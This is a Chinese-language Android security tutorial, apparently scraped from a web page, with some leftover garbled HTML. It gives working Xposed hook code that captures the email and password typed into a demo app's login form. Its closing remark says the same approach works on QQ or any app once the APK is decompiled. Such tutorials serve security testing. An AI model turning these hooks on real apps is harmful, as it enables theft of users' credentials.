Android安全專項之Xposed劫持用戶名密碼實踐
Xposed是個強大的工具,可以hook所有的java方法,下面用Xposed來截獲App的用戶名密碼,默認你已經安裝好Xposed環境了
AS中創建帶有Login界面的項目
![這裡寫圖片描述](https://www.android5.online/Android/UploadFiles_5356/201603/2016031418005758.png "\")
然後一路Next,創建成功後,運行,App界面如下:<�喎?http://www.Bkjia.com/kf/ware/vc/" target="_blank" class="keylink">vcD4NCjxwPjxpbWcgYWx0PQ=="這裡寫圖片描述" src="http://www.bkjia.com/uploads/allimg/160311/041H955X-1.png" title="\" />
為了使用Xposed劫持應用的用戶名和密碼,我們需要知道該應用的包名和要hook的方法,我們只要找到點擊SIGN IN OR REGISTER按鈕的點擊事件處理方法,只要hook這個方法,我們就能獲取到輸入框中的信息。
包名:
xposed.doctorq.com.qq4xposed hook的方法:
xposed.doctorq.com.qq4xposed.LoginActivity.attemptLogin
在hook的beforeHookedMethod方法中獲取下面兩個屬性的值:
![這裡寫圖片描述](https://www.android5.online/Android/UploadFiles_5356/201603/2016031418005867.png "\")
Xposed Module
Xposed Module稱為Xposed插件,利用Xposed進行實際劫持的項目。
我們創建一個不帶界面的Android項目,創建一個類,實現IXposedHookLoadPackage:
public class LoginHook implements IXposedHookLoadPackage{
@Override
public void handleLoadPackage(XC_LoadPackage.LoadPackageParam loadPackageParam) throws Throwable {
if(!loadPackageParam.packageName.equals("xposed.doctorq.com.qq4xposed")) return;
findAndHookMethod("xposed.doctorq.com.qq4xposed.LoginActivity", loadPackageParam.classLoader, "attemptLogin", new XC_MethodHook() {
@Override
protected void beforeHookedMethod(MethodHookParam param) throws Throwable {
XposedBridge.log("已經HOOK");
Class o = param.thisObject.getClass();
XposedBridge.log(o.getName());
Field.setAccessible(o.getDeclaredFields(), true);
Field fieldEmail = findField(o, "mEmailView");
Field fieldPassword = findField(o,"mPasswordView");
AutoCompleteTextView autoTextView = (AutoCompleteTextView)fieldEmail.get(param.thisObject);
EditText editText = (EditText)fieldPassword.get(param.thisObject);
String email = autoTextView.getText().toString();
String password = editText.getText().toString();
Toast.makeText((Activity)param.thisObject,"郵箱: " + email + ",密碼 : " + password,Toast.LENGTH_LONG).show();
}
@Override
protected void afterHookedMethod(MethodHookParam param) throws Throwable {
}
});
}
}
將xposed_init文件修改如下:
![這裡寫圖片描述](https://www.android5.online/Android/UploadFiles_5356/201603/2016031418005837.png "\")
安裝該應用,在Xposed Installer中勾選,重啟生效,操作之前的App,正常輸入郵箱和密碼:
![這裡寫圖片描述](https://www.android5.online/Android/UploadFiles_5356/201603/2016031418005866.gif "\")
總結
使用Xposed進行hook的時候,難點不是如何使用Xposed,而是如何找到要被hook的方法,比如你如何hook QQ登錄方法,這就需要反編譯QQ的Apk找到登錄入口,要是學會這一點,隨便一個App你都能Hook。
